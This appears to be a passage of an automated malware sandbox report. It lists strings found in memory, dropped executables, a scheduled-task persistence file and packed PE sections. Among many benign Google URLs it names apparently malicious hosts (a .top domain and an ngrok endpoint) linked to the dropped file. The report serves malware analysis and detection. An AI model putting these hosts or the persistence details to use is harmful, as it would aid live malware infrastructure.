Source: chrome.exe, 00000009.00000002.2834089663.000028F000093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000009.00000002.2847119864.000028F00088C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000009.00000002.2847119864.000028F00088C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs(
Source: chrome.exe, 00000009.00000002.2847714446.000028F0009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000009.00000002.2847714446.000028F0009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/a
Source: chrome.exe, 00000009.00000002.2847938121.000028F000A50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000009.00000002.2834089663.000028F000078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000009.00000002.2844429491.000028F0003C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000009.00000002.2833919397.000028F00001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000009.00000002.2848780427.000028F000BA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000009.00000002.2844574821.000028F00041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847119864.000028F00088C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2833919397.000028F00001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845789225.000028F0005EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000009.00000002.2833919397.000028F00001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard0
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000009.00000002.2848780427.000028F000BA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000009.00000002.2847637335.000028F0009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000009.00000002.2834248809.000028F0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000009.00000002.2834248809.000028F0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000009.00000002.2834248809.000028F0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000009.00000002.2834089663.000028F000078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000009.00000003.2822199638.000028F000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2822243690.000028F0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846882643.000028F00081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2815554530.000028F000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000009.00000002.2844379465.000028F0003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2834343603.000028F0000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.2846531786.000028F00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000009.00000002.2847675953.000028F0009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850170685.000028F000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850170685.000028F000DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000009.00000002.2848170055.000028F000AD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850170685.000028F000DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000009.00000003.2823888415.000028F000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850462051.000028F000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850389939.000028F000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850170685.000028F000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2850426340.000028F000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000009.00000002.2847675953.000028F0009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000009.00000002.2847675953.000028F0009BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000009.00000002.2834089663.000028F000078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000009.00000002.2834248809.000028F0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.2846731872.000028F0007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846847908.000028F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000009.00000002.2847862323.000028F000A28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000009.00000002.2847565153.000028F000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ww.google.com/
Source: chrome.exe, 00000009.00000002.2848906240.000028F000BE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000009.00000002.2845551588.000028F000590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000009.00000002.2848985821.000028F000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000009.00000002.2848985821.000028F000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000009.00000002.2846367779.000028F000704000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845789225.000028F0005EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000009.00000003.2802194403.000028F000438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2846073020.000028F00066C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000009.00000002.2846882643.000028F00081C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847523740.000028F000968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847082080.000028F000878000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000009.00000002.2835166094.000028F0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847523740.000028F000968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2847082080.000028F000878000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000009.00000002.2847637335.000028F0009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000009.00000002.2846531786.000028F00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2844770742.000028F000444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845602419.000028F0005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoNames)
Source: chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000009.00000002.2848017138.000028F000A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000009.00000002.2833919397.000028F00001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845475003.000028F00056C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000009.00000002.2836508824.000028F00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2849176805.000028F000C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000009.00000002.2844824737.000028F000470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000009.00000002.2837410973.000028F0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.2802799955.000028F0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2845650113.000028F0005CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443

System Summary

Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File dump: service123.exe.7.dr 234885120 Jump to dropped file
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: f7fa65d988.exe.6.dr Static PE information: section name:
Source: f7fa65d988.exe.6.dr Static PE information: section name: .rsrc
Source: f7fa65d988.exe.6.dr Static PE information: section name: .idata
Source: f7fa65d988.exe.6.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe FF7DC25CE280C034E4038D4EBC20560904CEEF62C9ADA19631C8F4A42183C98D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe FF7DC25CE280C034E4038D4EBC20560904CEEF62C9ADA19631C8F4A42183C98D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe E121118EB9676FFD4BEBCE8890B74D47DBD7051FCE8A9BC5DEA45552DCCDCF56
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9982916808583107
Source: file.exe Static PE information: Section: rvvxjflc ZLIB complexity 0.9946319698610696
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982916808583107
Source: skotes.exe.0.dr Static PE information: Section: rvvxjflc ZLIB complexity 0.9946319698610696
Source: random[1].exe.6.dr Static PE information: Section: ozbvvmja ZLIB complexity 0.9943599824514039
Source: f7fa65d988.exe.6.dr Static PE information: Section: ozbvvmja ZLIB complexity 0.9943599824514039
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
